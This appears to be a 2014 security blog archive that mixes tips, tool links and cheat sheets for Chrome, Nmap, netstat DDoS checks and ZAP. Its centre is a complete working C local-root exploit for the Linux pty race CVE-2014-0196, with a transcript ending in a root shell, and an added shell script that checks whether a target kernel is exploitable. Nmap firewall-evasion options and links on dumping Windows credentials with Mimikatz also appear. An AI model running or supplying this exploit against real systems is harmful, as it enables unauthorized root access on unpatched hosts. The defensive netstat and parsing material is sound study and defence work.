May 17, 2014

Howto: Make the Chrome browser on Android smoother and faster

By default, Chrome on Android caps the memory it uses for the pre-rendered page tiles around the viewport at 128 MB, and scrolling and zooming start to bog down once that budget is used up. High-end and even mid-range Android phones now have plenty of RAM, so if you are a heavy Chrome user there is no reason to stay within that limit.

1. Open Chrome

2. Type chrome://flags/#max-tiles-for-interest-area in the address bar

3. Change the value from the default (128 MB) to 256 or 512 MB

4. Relaunch Chrome for the change to take effect

Source: http://bgr.com/2014/05/16/android-tips-tricks-speed-up-chrome-tweak/

If you like my blog, Please Donate Me
Or Click The Banner For Support Me.

Tools: Replayproxy

Forensic tool to replay web-based attacks (and also general HTTP traffic) that were captured in a pcap file.




May 16, 2014

Howto: Create a hidden folder that is not actually hidden in Windows

1. Create a folder

2. Open the folder's Properties, go to the Customize tab, click Change Icon and pick a blank icon

3. Go to Run -> Character Map

4. Find a blank character and copy it (the non-breaking space, Alt+0160, is the usual choice; Explorer refuses a name made only of ordinary spaces)

5. Rename the folder to that single character

6. That's it: the folder now has no visible name and no visible icon. Bear in mind that this only fools the eye. No Hidden or System attribute is set, so the folder still shows up in dir listings, in Explorer search and in any forensic tool that enumerates the file system.


Series For Dumping Windows Credentials

Dumping Windows Credentials
https://www.securusglobal.com/community/2013/12/20/dumping-windows-credentials/

Dumping NTDS.dit Domain Hashes Using Samba 

http://www.room362.com/blog/2014/05/14/dumping-ntds-dot-dit-domain-hashes-using-samba/

Using Mimikatz to Dump Passwords!

http://blog.opensecurityresearch.com/2012/06/using-mimikatz-to-dump-passwords.html


Tools: APK Downloader

For anyone who wants to download an APK file straight from Google Play.

http://apps.evozi.com/apk-downloader/

 



May 15, 2014

Howto: Use Nmap to list only the hosts that are down

nmap -v -sn -oG - target_ip | grep 'Status: Down'

-sn is a ping sweep with no port scan (the older spelling was -sP) and -oG - writes grepable output to stdout, one "Host: <ip> (<name>)<tab>Status: <Up|Down>" line per host. Match on the whole 'Status: Down' field rather than a bare Down, otherwise a reverse-DNS name that happens to contain that string shows up as a false positive.

CheatSheet: Multi Cheat Sheet

This source is very useful. It has cheat sheets for many programming languages and libraries, such as Python, Java, PHP, jQuery, etc. Please check the source.




Source: http://overapi.com/python/


Tools: Bradamsa - Burp Suite extension to generate Intruder payloads using Radamsa

How To Use It

  1. Install Radamsa, either from the Haltp git repository:
$ git clone http://haltp.org/git/radamsa.git
$ cd radamsa
$ make
$ sudo make install
     or from the release tarball on the official Google Code project page:
$ curl https://ouspg.googlecode.com/files/radamsa-0.3.tar.gz | tar -zxvf - && cd radamsa-0.3 && make && sudo make install && man radamsa
  2. From the Extender tab in Burp Suite, add bradamsa.jar
  3. Open the Bradamsa tab and configure Radamsa. For more details, refer to the official Radamsa page or run $ radamsa --help in your terminal
  4. Send a request to Burp Intruder
  5. In Payloads --> Payload Sets --> Payload type, select "Extension-generated"
  6. In Payloads --> Payload Options --> Select generator, choose "Bradamsa" from the drop-down list
  7. Finish configuring Burp Intruder and start fuzzing
Source: https://github.com/ikkisoft/bradamsa




May 14, 2014

CheatSheet: Nmap Cheat Sheet


Basic Scanning Techniques
Scan a single target -> nmap [target]
Scan multiple targets -> nmap [target1,target2,etc]
Scan a list of targets -> nmap -iL [list.txt]
Scan a range of hosts -> nmap [range of IP addresses]
Scan an entire subnet -> nmap [IP address/cidr]
Scan random hosts -> nmap -iR [number]
Excluding targets from a scan -> nmap [targets] --exclude [targets]
Excluding targets using a list -> nmap [targets] --excludefile [list.txt]
Perform an aggressive scan -> nmap -A [target]
Scan an IPv6 target -> nmap -6 [target]
Discovery Options
Perform a ping scan only, no port scan (-sP is the old spelling) -> nmap -sn [target]
Don't ping, treat every host as up (-PN is the old spelling) -> nmap -Pn [target]
TCP SYN ping -> nmap -PS [target]
TCP ACK ping -> nmap -PA [target]
UDP ping -> nmap -PU [target]
SCTP INIT ping -> nmap -PY [target]
ICMP echo ping -> nmap -PE [target]
ICMP timestamp ping -> nmap -PP [target]
ICMP address mask ping -> nmap -PM [target]
IP protocol ping -> nmap -PO [target]
ARP ping -> nmap -PR [target]
Traceroute -> nmap --traceroute [target]
Force reverse DNS resolution -> nmap -R [target]
Disable reverse DNS resolution -> nmap -n [target]
Alternative DNS lookup (use the system resolver) -> nmap --system-dns [target]
Manually specify DNS servers -> nmap --dns-servers [servers] [target]
Create a host list (list scan; nothing but reverse DNS is sent) -> nmap -sL [targets]
Advanced Scanning Options
TCP SYN scan -> nmap -sS [target]
TCP connect scan -> nmap -sT [target]
UDP scan -> nmap -sU [target]
TCP Null scan -> nmap -sN [target]
TCP FIN scan -> nmap -sF [target]
Xmas scan -> nmap -sX [target]
TCP ACK scan -> nmap -sA [target]
Custom TCP scan -> nmap --scanflags [flags] [target]
IP protocol scan -> nmap -sO [target]
Send raw Ethernet packets -> nmap --send-eth [target]
Send IP packets -> nmap --send-ip [target]
Port Scanning Options
Perform a fast scan (100 most common ports) -> nmap -F [target]
Scan specific ports -> nmap -p [ports] [target]
Scan ports by name -> nmap -p [port name] [target]
Scan ports by protocol -> nmap -sU -sT -p U:[ports],T:[ports] [target]
Scan all 65535 ports -> nmap -p- [target]
Scan top ports -> nmap --top-ports [number] [target]
Perform a sequential port scan (don't randomize port order) -> nmap -r [target]
Version Detection
Operating system detection -> nmap -O [target]
Submit TCP/IP fingerprints -> http://www.nmap.org/submit/
Attempt to guess an unknown OS -> nmap -O --osscan-guess [target]
Service version detection -> nmap -sV [target]
Troubleshooting version scans -> nmap -sV --version-trace [target]
Perform an RPC scan (now an alias for -sV) -> nmap -sR [target]
Timing Options
Timing templates (0 paranoid .. 5 insane) -> nmap -T[0-5] [target]
Set the packet TTL -> nmap --ttl [value] [target]
Minimum parallel probes -> nmap --min-parallelism [number] [target]
Maximum parallel probes -> nmap --max-parallelism [number] [target]
Minimum host group size -> nmap --min-hostgroup [number] [targets]
Maximum host group size -> nmap --max-hostgroup [number] [targets]
Initial RTT timeout -> nmap --initial-rtt-timeout [time] [target]
Maximum RTT timeout -> nmap --max-rtt-timeout [time] [target]
Maximum retries -> nmap --max-retries [number] [target]
Host timeout -> nmap --host-timeout [time] [target]
Minimum scan delay -> nmap --scan-delay [time] [target]
Maximum scan delay -> nmap --max-scan-delay [time] [target]
Minimum packet rate -> nmap --min-rate [number] [target]
Maximum packet rate -> nmap --max-rate [number] [target]
Defeat RST rate limits -> nmap --defeat-rst-ratelimit [target]
Firewall Evasion Techniques
Fragment packets -> nmap -f [target]
Specify a specific MTU -> nmap --mtu [MTU] [target]
Use random decoys -> nmap -D RND:[number] [target]
Idle zombie scan -> nmap -sI [zombie] [target]
Manually specify a source port -> nmap --source-port [port] [target]
Append random data -> nmap --data-length [size] [target]
Randomize target scan order -> nmap --randomize-hosts [target]
Spoof MAC address -> nmap --spoof-mac [MAC|0|vendor] [target]
Send bad checksums -> nmap --badsum [target]
Output Options
Save output to a text file -> nmap -oN [scan.txt] [target]
Save output to an XML file -> nmap -oX [scan.xml] [target]
Grepable output -> nmap -oG [scan.txt] [target]
Output all supported file types -> nmap -oA [path/filename] [target]
Periodically display statistics -> nmap --stats-every [time] [target]
Script kiddie (l33t) output -> nmap -oS [scan.txt] [target]
Troubleshooting and Debugging
Help -> nmap -h
Display Nmap version -> nmap -V
Verbose output -> nmap -v [target]
Debugging -> nmap -d [target]
Display port state reason -> nmap --reason [target]
Only display open ports -> nmap --open [target]
Trace packets -> nmap --packet-trace [target]
Display host networking -> nmap --iflist
Specify a network interface -> nmap -e [interface] [target]
Nmap Scripting Engine
Execute individual scripts -> nmap --script [script.nse] [target]
Execute multiple scripts -> nmap --script [expression] [target]
Script categories -> auth, broadcast, brute, default, discovery, dos, exploit, external, fuzzer, intrusive, malware, safe, version, vuln (and "all" for every script)
Execute scripts by category -> nmap --script [category] [target]
Execute multiple script categories -> nmap --script [category1,category2,etc] [target]
Troubleshoot scripts -> nmap --script [script] --script-trace [target]
Update the script database -> nmap --script-updatedb
Ndiff
Comparison using Ndiff -> ndiff [scan1.xml] [scan2.xml]
Ndiff verbose mode -> ndiff -v [scan1.xml] [scan2.xml]
XML output mode -> ndiff --xml [scan1.xml] [scan2.xml]
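The grepable (-oG) format listed under Output Options, and used by the "Howto: Use Nmap to list only the hosts that are down" one-liner above, is tab-separated and easy to parse properly. What follows is an added example, not part of the original cheat sheet and not Nmap's own tooling: two shell functions that read -oG output on stdin and pull out hosts by status and open ports per host, run against constructed sample output (the 192.0.2.x addresses, the host names and the version strings are made up). It also shows why a bare grep Down over-matches.

```shell
#!/bin/sh
# Added example: parse nmap grepable (-oG) output. All sample data below is constructed.

# Print the IP of every host whose status is $1 (Up or Down).
# Comparing the whole "Status: X" field avoids false positives from
# reverse-DNS names that happen to contain the word.
nmap_hosts_by_status() {
    awk -F '\t' -v want="Status: $1" '
        /^Host: / {
            split($1, h, " ")                      # h[2] is the IP address
            for (i = 2; i <= NF; i++)
                if ($i == want) print h[2]
        }'
}

# Print "ip port/proto service" for every open port in -oG output.
# A Ports: entry looks like port/state/proto/owner/service/rpcinfo/version/
nmap_open_ports() {
    awk -F '\t' '
        /^Host: / {
            split($1, h, " "); ip = h[2]
            for (i = 2; i <= NF; i++) {
                if ($i !~ /^Ports: /) continue
                sub(/^Ports: /, "", $i)
                n = split($i, entries, /, /)
                for (j = 1; j <= n; j++) {
                    split(entries[j], f, "/")
                    if (f[2] == "open") print ip, f[1] "/" f[3], f[5]
                }
            }
        }'
}

# Constructed sample of `nmap -v -sn -oG - 192.0.2.0/29` (ping sweep).
sample_ping_scan() {
    printf '# Nmap 6.46 scan initiated Thu May 15 10:00:00 2014 as: nmap -v -sn -oG - 192.0.2.0/29\n'
    printf 'Host: 192.0.2.1 (gw.example.net)\tStatus: Up\n'
    printf 'Host: 192.0.2.2 ()\tStatus: Down\n'
    printf 'Host: 192.0.2.3 (Download-Server.example.net)\tStatus: Up\n'
    printf 'Host: 192.0.2.4 ()\tStatus: Down\n'
    printf '# Nmap done at Thu May 15 10:00:02 2014 -- 8 IP addresses (2 hosts up) scanned in 1.95 seconds\n'
}

# Constructed sample of `nmap -sV -oG - 192.0.2.1 192.0.2.3` (port scan).
sample_port_scan() {
    printf '# Nmap 6.46 scan initiated Thu May 15 10:05:00 2014 as: nmap -sV -oG - 192.0.2.1 192.0.2.3\n'
    printf 'Host: 192.0.2.1 (gw.example.net)\tStatus: Up\n'
    printf 'Host: 192.0.2.1 (gw.example.net)\tPorts: 22/open/tcp//ssh//OpenSSH 6.6p1/, 80/open/tcp//http//nginx/, 443/closed/tcp//https///\tIgnored State: filtered (997)\n'
    printf 'Host: 192.0.2.3 (Download-Server.example.net)\tStatus: Up\n'
    printf 'Host: 192.0.2.3 (Download-Server.example.net)\tPorts: 21/open/tcp//ftp//vsftpd 3.0.2/\tIgnored State: closed (999)\n'
}

echo "hosts that are down:"
sample_ping_scan | nmap_hosts_by_status Down          # 192.0.2.2 and 192.0.2.4
echo "lines a bare 'grep Down' would return: $(sample_ping_scan | grep -c Down)"   # 3: one of them is an Up host
echo "open ports:"
sample_port_scan | nmap_open_ports
```

Both functions are meant to be fed directly by nmap (nmap -sn -oG - 10.0.0.0/24 | nmap_hosts_by_status Down); the samples stand in for that here so the script runs offline.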


Source: http://pentestlab.wordpress.com/2012/08/17/nmap-cheat-sheet/




Slides: PowerUp - Automating Windows Privilege Escalation by @harmj0y






Source: http://www.slideshare.net/harmj0y/power-up-34515686#btnNext





[POC] CVE-2014-0196: Linux kernel pty layer race condition memory corruption (local root exploit)

/*
 * CVE-2014-0196: Linux kernel <= v3.15-rc4: raw mode PTY local echo race
 * condition
 *
 * Slightly-less-than-POC privilege escalation exploit
 * For kernels >= v3.14-rc1
 *
 * Matthew Daley <mattd@bugfuzz.com>
 *
 * Usage: 
 *   $ gcc cve-2014-0196-md.c -lutil -lpthread
 *   $ ./a.out
 *   [+] Resolving symbols
 *   [+] Resolved commit_creds: 0xffffffff81056694
 *   [+] Resolved prepare_kernel_cred: 0xffffffff810568a7
 *   [+] Doing once-off allocations
 *   [+] Attempting to overflow into a tty_struct...............
 *   [+] Got it :)
 *   # id
 *   uid=0(root) gid=0(root) groups=0(root)
 *
 * WARNING: The overflow placement is still less-than-ideal; there is a 1/4
 * chance that the overflow will go off the end of a slab. This does not
 * necessarily lead to an immediate kernel crash, but you should be prepared
 * for the worst (i.e. kernel oopsing in a bad state). In theory this would be
 * avoidable by reading /proc/slabinfo on systems where it is still available
 * to unprivileged users.
 *
 * Caveat: The vulnerability should be exploitable all the way from
 * v2.6.31-rc3, however relevant changes to the TTY subsystem were made in
 * commit acc0f67f307f52f7aec1cffdc40a786c15dd21d9 ("tty: Halve flip buffer
 * GFP_ATOMIC memory consumption") that make exploitation simpler, which this
 * exploit relies on.
 *
 * Thanks to Jon Oberheide for his help on exploitation technique.
 */

#define _GNU_SOURCE          /* setresuid()/setresgid() prototypes in <unistd.h> */
#include <sys/ioctl.h>       /* ioctl() */
#include <sys/stat.h>
#include <sys/types.h>
#include <fcntl.h>
#include <pthread.h>
#include <pty.h>
#include <stdio.h>
#include <string.h>
#include <termios.h>
#include <unistd.h>

#define TTY_MAGIC 0x5401

#define ONEOFF_ALLOCS 200
#define RUN_ALLOCS    30

struct device;
struct tty_driver;
struct tty_operations;

typedef struct {
 int counter;
} atomic_t;

struct kref {
 atomic_t refcount;
};

struct tty_struct_header {
 int magic;
 struct kref kref;
 struct device *dev;
 struct tty_driver *driver;
 const struct tty_operations *ops;
} overwrite;

typedef int __attribute__((regparm(3))) (* commit_creds_fn)(unsigned long cred);
typedef unsigned long __attribute__((regparm(3))) (* prepare_kernel_cred_fn)(unsigned long cred);

int master_fd, slave_fd;
char buf[1024] = {0};
commit_creds_fn commit_creds;
prepare_kernel_cred_fn prepare_kernel_cred;

int payload(void) {
 commit_creds(prepare_kernel_cred(0));

 return 0;
}

unsigned long get_symbol(char *target_name) {
 FILE *f;
 unsigned long addr;
 char dummy;
 char name[256];
 int ret = 0;

 f = fopen("/proc/kallsyms", "r");
 if (f == NULL)
  return 0;

 while (ret != EOF) {
  ret = fscanf(f, "%p %c %s\n", (void **)&addr, &dummy, name);
  if (ret == 0) {
   fscanf(f, "%s\n", name);
   continue;
  }

  if (!strcmp(name, target_name)) {
   printf("[+] Resolved %s: %p\n", target_name, (void *)addr);

   fclose(f);
   return addr;
  }
 }

 printf("[-] Couldn't resolve \"%s\"\n", name);

 fclose(f);
 return 0;
}

/* Writer that races the echo path on the other side of the pty: the first
 * two writes fill the buffer up to the boundary, the third carries the fake
 * tty_struct header that is meant to spill into a neighbouring tty_struct
 * in the same slab. */
void *overwrite_thread_fn(void *p) {
 (void)p;

 write(slave_fd, buf, 511);

 write(slave_fd, buf, 1024 - 32 - (1 + 511 + 1));
 write(slave_fd, &overwrite, sizeof(overwrite));

 return NULL;
}

int main() {
 char scratch[1024] = {0};
 void *tty_operations[64];
 int i, temp_fd_1, temp_fd_2;

 for (i = 0; i < 64; ++i)
  tty_operations[i] = payload;

 overwrite.magic                 = TTY_MAGIC;
 overwrite.kref.refcount.counter = 0x1337;
 overwrite.dev                   = (struct device *)scratch;
 overwrite.driver                = (struct tty_driver *)scratch;
 overwrite.ops                   = (struct tty_operations *)tty_operations;

 puts("[+] Resolving symbols");

 commit_creds = (commit_creds_fn)get_symbol("commit_creds");
 prepare_kernel_cred = (prepare_kernel_cred_fn)get_symbol("prepare_kernel_cred");
 if (!commit_creds || !prepare_kernel_cred)
  return 1;

 puts("[+] Doing once-off allocations");

 for (i = 0; i < ONEOFF_ALLOCS; ++i)
  if (openpty(&temp_fd_1, &temp_fd_2, NULL, NULL, NULL) == -1) {
   puts("[-] pty creation failed");
   return 1;
  }

 printf("[+] Attempting to overflow into a tty_struct...");
 fflush(stdout);

 for (i = 0; ; ++i) {
  struct termios t;
  int fds[RUN_ALLOCS], fds2[RUN_ALLOCS], j;
  pthread_t overwrite_thread;

  if (!(i & 0xfff)) {
   putchar('.');
   fflush(stdout);
  }

  if (openpty(&master_fd, &slave_fd, NULL, NULL, NULL) == -1) {
   puts("\n[-] pty creation failed");
   return 1;
  }

  for (j = 0; j < RUN_ALLOCS; ++j)
   if (openpty(&fds[j], &fds2[j], NULL, NULL, NULL) == -1) {
    puts("\n[-] pty creation failed");
    return 1;
   }

  close(fds[RUN_ALLOCS / 2]);
  close(fds2[RUN_ALLOCS / 2]);

  /* Prime the buffer, then put the pty into raw mode (no output
   * post-processing) with local echo still enabled: the combination the
   * race described in the header comment depends on. */
  write(slave_fd, buf, 1);

  tcgetattr(master_fd, &t);
  t.c_oflag &= ~OPOST;
  t.c_lflag |= ECHO;
  tcsetattr(master_fd, TCSANOW, &t);

  if (pthread_create(&overwrite_thread, NULL, overwrite_thread_fn, NULL)) {
   puts("\n[-] Overwrite thread creation failed");
   return 1;
  }
  write(master_fd, "A", 1);
  pthread_join(overwrite_thread, NULL);

  /* Poke every candidate tty with a bogus ioctl request. Whichever
   * tty_struct the overflow landed on now carries our fake ops table, so
   * its ioctl dispatches into payload() and swaps in root credentials;
   * on the untouched ttys the request is simply rejected. */
  for (j = 0; j < RUN_ALLOCS; ++j) {
   if (j == RUN_ALLOCS / 2)
    continue;

   ioctl(fds[j], 0xdeadbeef);
   ioctl(fds2[j], 0xdeadbeef);

   close(fds[j]);
   close(fds2[j]);
  }

  ioctl(master_fd, 0xdeadbeef);
  ioctl(slave_fd, 0xdeadbeef);

  close(master_fd);
  close(slave_fd);

  if (!setresuid(0, 0, 0)) {
   setresgid(0, 0, 0);

   puts("\n[+] Got it :)");
   execl("/bin/bash", "/bin/bash", NULL);
  }
 }
}
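Two preflight checks a tester wants before running the PoC above, as an added example in shell and not a change to Matthew Daley's code: the exploit resolves commit_creds and prepare_kernel_cred by reading /proc/kallsyms, and a kptr_restrict of 1 or 2 turns those addresses into all zeros for an unprivileged reader, which get_symbol() would happily hand to the payload; and the header gives two version windows (the bug is present from v2.6.31-rc3 to v3.15-rc4, this particular PoC expects v3.14-rc1 or later). The kallsyms lines below are constructed (the two addresses are the ones in the usage transcript of the header), and the version comparison is a plain tuple compare that treats a release as newer than its -rc candidates. It says nothing about distribution kernels, which backport fixes without changing the version string; for those, the presence of the patch is the only real test.

```shell
#!/bin/sh
# Added example: preflight checks for the CVE-2014-0196 PoC. Sample data is constructed.

# Address of kernel symbol $1 from /proc/kallsyms-format input on stdin
# ("<addr> <type> <name>"); prints nothing if the symbol is absent.
ksym_addr() {
    awk -v sym="$1" '$3 == sym { print $1; exit }'
}

# Succeeds only if the symbol resolves to a real address. With
# kptr_restrict=1 or 2 an unprivileged reader sees 0000000000000000.
ksym_usable() {
    addr=$(ksym_addr "$1")
    [ -n "$addr" ] && [ "$addr" != "0000000000000000" ] && [ "$addr" != "00000000" ]
}

# Normalise a kernel version to "major minor patch rc": "3.14.3" -> "3 14 3 999",
# "3.15-rc4" -> "3 15 0 4", so a release sorts after all of its -rc candidates.
kver_key() {
    printf '%s\n' "$1" | awk -F '[.-]' '{
        rc = 999; n = 0
        for (i = 1; i <= NF; i++) {
            if ($i ~ /^rc[0-9]+$/) rc = substr($i, 3) + 0
            else if ($i ~ /^[0-9]+$/) v[++n] = $i + 0
        }
        printf "%d %d %d %d\n", v[1], v[2], (n >= 3 ? v[3] : 0), rc
    }'
}

# kver_le A B: succeeds if kernel version A <= B.
kver_le() {
    { kver_key "$1"; kver_key "$2"; } | awk '
        NR == 1 { split($0, a, " ") }
        NR == 2 { for (i = 1; i <= 4; i++) {
                      if (a[i] + 0 < $i + 0) exit 0
                      if (a[i] + 0 > $i + 0) exit 1
                  }
                  exit 0 }'
}

# Mainline window in which the bug is present (from the PoC header).
cve_2014_0196_version_in_range() {
    kver_le 2.6.31-rc3 "$1" && kver_le "$1" 3.15-rc4
}

# Narrower window in which this particular PoC is expected to work.
cve_2014_0196_poc_applies() {
    kver_le 3.14-rc1 "$1" && kver_le "$1" 3.15-rc4
}

# Constructed /proc/kallsyms excerpts: readable, and hidden by kptr_restrict.
sample_kallsyms_readable() {
    printf '%s\n' 'ffffffff81056694 T commit_creds' 'ffffffff810568a7 T prepare_kernel_cred'
}
sample_kallsyms_restricted() {
    printf '%s\n' '0000000000000000 T commit_creds' '0000000000000000 T prepare_kernel_cred'
}

for v in 2.6.30 2.6.31-rc3 3.13.11 3.14.3 3.15-rc4 3.15; do
    if cve_2014_0196_poc_applies "$v"; then echo "$v: in range, PoC applies"
    elif cve_2014_0196_version_in_range "$v"; then echo "$v: in range, but PoC needs >= 3.14-rc1"
    else echo "$v: outside the mainline-vulnerable window"; fi
done
if sample_kallsyms_restricted | ksym_usable commit_creds; then echo "kallsyms: readable"
else echo "kallsyms: commit_creds hidden, PoC cannot resolve symbols"; fi
```

On a live box the checks are `ksym_usable commit_creds < /proc/kallsyms` and `cve_2014_0196_version_in_range "$(uname -r | cut -d- -f1)"`; the sample functions stand in for those inputs here.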




Source: http://www.reddit.com/r/netsec/comments/25cskj/poc_cve20140196_linux_kernel_pty_layer_race/



Tools: iOS Reverse Engineering Toolkit(IRET)

It should be the goal of every worker to expend less time and energy to achieve a task, while still maintaining, or even increasing, productivity. As an iOS penetration tester, I find myself repeating the same manual tasks for each test. Typing out the same commands to run various tools that are required to help me do my job. And to be honest, it’s completely monotonous. Every time I fat-finger a key, I lose productivity, forcing me to expend more time and energy to achieve the task. I’m a fan of automation. I’m a fan of streamlined innovation that saves me time and still accomplishes, for the most part, the same results. It was this desire to save time, and reduce my likelihood of suffering from carpal tunnel, that I created the iOS Reverse Engineering Toolkit.

What is iRET?

So what is iRET? Well, for lack of a better, more eloquent definition, it's a toolkit that allows you to automate many of the manual tasks an iOS penetration tester would need to perform in order to analyze and reverse engineer iOS applications. And the bonus is... this can all be performed right on the device. Still sound like an interesting toolkit? Great, read on.



Source: http://blog.veracode.com/2014/03/introducing-the-ios-reverse-engineering-toolkit/




CheatSheet: Archlinux


Source: http://elzoona.com.ar/archcheatsheet/archcheatsheet.pdf


CheatSheet: SQLMap

Download Link: https://github.com/aramosf/sqlmap-cheatsheet/raw/master/sqlmap%20cheatsheet%20v1.0-SBD.pdf

Source: http://www.reddit.com/r/netsec/comments/25grqk/sqlmap_cheatsheet/


May 12, 2014

Howto: Debug OWASP ZAP Proxy in Kali

1. Go to /usr/share/zaproxy/xml

2. Open the file log4j.properties

3. Change
log4j.logger.org.parosproxy.paros=INFO
log4j.logger.org.zaproxy.zap=INFO
to
log4j.logger.org.parosproxy.paros=DEBUG
log4j.logger.org.zaproxy.zap=DEBUG

4. Restart ZAP for the change to take effect. The extra output goes to the log file configured by the appender entries in the same properties file. DEBUG is verbose; switch back to INFO once you have what you need.




Howto: Verify a DDoS attack with netstat

Some examples with explanations

netstat -na
Displays all sockets numerically (no DNS lookups): listening sockets as well as established and half-open connections.
netstat -an | grep :80 | sort
Shows only the connections involving port 80, the HTTP port, sorted, so it is useful on a web server: a single-source flood stands out as a long run of connections from one IP.
netstat -n -p | grep SYN_REC | wc -l
Counts the half-open connections (Linux prints the state as SYN_RECV; grep SYN_REC matches it as a substring). The number should be pretty low, preferably less than 5. During a DoS attack or a mail bomb it can jump very high. The value always depends on the system, though, so what is high on one server may be normal on another.
netstat -n -p | grep SYN_REC | sort -u
Lists the half-open connections themselves instead of just counting them.
netstat -n -p | grep SYN_REC | awk '{print $5}' | awk -F: '{print $1}'
Lists the remote addresses whose connections are stuck in SYN_RECV. Note that cutting on the first ":" mangles IPv6 peers, whose addresses contain colons themselves.
netstat -ntu | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
Counts how many connections each remote IP address has to the server.
netstat -anp | grep -E 'tcp|udp' | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -n
The same count restricted to TCP and UDP sockets. The alternation needs grep -E (or \| in basic syntax); a plain grep 'tcp|udp' looks for that literal string and matches nothing.
netstat -ntu | grep ESTAB | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nr
Restricts the count to ESTABLISHED connections, highest count first.
netstat -plan | grep :80 | awk '{print $5}' | cut -d: -f1 | sort | uniq -c | sort -nk 1
Lists the IP addresses connected to port 80, the HTTP port, with their connection counts.

How to mitigate a DoS attack

Once you have found the IPs that are attacking your server, you can block them with a rule inserted at the top of the INPUT chain:
iptables -I INPUT 1 -s $IPADDRESS -j DROP
Use -j REJECT instead of DROP if you prefer to answer with a reset. Note that -I takes the rule number; -A appends and does not, so "iptables -A INPUT 1 ..." is a syntax error. Replace $IPADDRESS with each IP found with netstat. Bear in mind that the source addresses of a SYN flood are usually spoofed, so blocking them one by one does little against that kind of attack; it does help against a real client hammering the server.
After adding the rules, kill all httpd connections to clean up the system and then restart the httpd service with the following commands:
killall -KILL httpd

service httpd start           #For Red Hat systems
/etc/init.d/apache2 restart   #For Debian systems
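As an added example, not part of the original post: one shell function that does the per-peer counting of the pipelines above in a single awk pass, reading netstat -ntu style output on stdin, filtering on a connection state and stripping the port without breaking IPv6 peers (cut -d: -f1 keeps only the first hextet of an IPv6 address), plus a helper that turns the suspects into the blocking rules. It runs against a constructed netstat snippet (the 203.0.113.x, 198.51.100.x, 192.0.2.x and 2001:db8:: addresses are documentation ranges) and prints the iptables commands rather than running them.

```shell
#!/bin/sh
# Added example: count connections per peer from netstat output. Sample data is constructed.

# Count connections per remote address. $1 is an optional state filter
# (SYN_RECV, ESTABLISHED, ...); reads `netstat -ntu` / `netstat -ntup` output on stdin.
# The port is stripped with a regex on the trailing ":digits", so IPv6 peers
# such as 2001:db8:1::5 survive intact (cut -d: -f1 would truncate them to "2001").
netstat_conn_counts() {
    awk -v want="${1:-}" '
        $1 ~ /^(tcp|udp)6?$/ && (want == "" || $6 == want) {
            peer = $5
            sub(/:[0-9]+$/, "", peer)
            count[peer]++
        }
        END { for (p in count) print count[p], p }' | sort -rn
}

# Print remote addresses with at least $1 half-open (SYN_RECV) connections.
syn_flood_suspects() {
    netstat_conn_counts SYN_RECV | awk -v min="$1" '$1 >= min { print $2 }'
}

# Emit (do not run) the blocking rule for each suspect: inserted at the top
# of INPUT with -I, since -A appends and takes no rule number.
block_rules_for_suspects() {
    syn_flood_suspects "$1" | while read -r ip; do
        printf 'iptables -I INPUT 1 -s %s -j DROP\n' "$ip"
    done
}

# Constructed sample of `netstat -ntu` output during a small SYN flood.
sample_netstat() {
    printf '%s\n' \
        'Active Internet connections (w/o servers)' \
        'Proto Recv-Q Send-Q Local Address           Foreign Address         State' \
        'tcp        0      0 203.0.113.10:80         198.51.100.7:51234      SYN_RECV' \
        'tcp        0      0 203.0.113.10:80         198.51.100.7:51235      SYN_RECV' \
        'tcp        0      0 203.0.113.10:80         198.51.100.7:51236      SYN_RECV' \
        'tcp        0      0 203.0.113.10:80         192.0.2.55:40001        ESTABLISHED' \
        'tcp        0      0 203.0.113.10:22         192.0.2.55:40002        ESTABLISHED' \
        'tcp6       0      0 2001:db8::10:80         2001:db8:1::5:55000     SYN_RECV' \
        'udp        0      0 203.0.113.10:53         192.0.2.99:5353'
}

echo "half-open connections per peer:"
sample_netstat | netstat_conn_counts SYN_RECV      # 3 198.51.100.7 / 1 2001:db8:1::5
echo "rules for peers with 3 or more half-open connections:"
sample_netstat | block_rules_for_suspects 3        # iptables -I INPUT 1 -s 198.51.100.7 -j DROP
```

On a real server replace sample_netstat with netstat -ntu (or ss -ntu, whose columns differ) and pipe the rules into sh only after reading them; the threshold is yours to pick from the baseline described above.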


Source: http://linuxaria.com/howto/how-to-verify-ddos-attack-with-netstat-command-on-linux-terminal




May 11, 2014

Ebook: Reverse Engineering for Beginners Book.

Reverse Engineering for Beginners Book.
Topics discussed: x86, ARM.
Topics touched: Oracle RDBMS, Itanium, copy-protection dongles, LD_PRELOAD,
stack overflow, ELF, win32 PE file format, x86-64, critical sections, syscalls,
TLS, position-independent code (PIC), profile-guided optimization, C++ STL, OpenMP, win32 SEH.
Compiled versions are:
(English) http://yurichev.com/writings/RE_for_beginners-en.pdf
          http://yurichev.com/writings/RE_for_beginners-en-A5.pdf (for e-book readers)
(Russian) http://yurichev.com/writings/RE_for_beginners-ru.pdf
          http://yurichev.com/writings/RE_for_beginners-ru-A5.pdf (for e-book readers)
See also ChangeLog file for latest changes!


Source: http://yurichev.com/RE-book.html
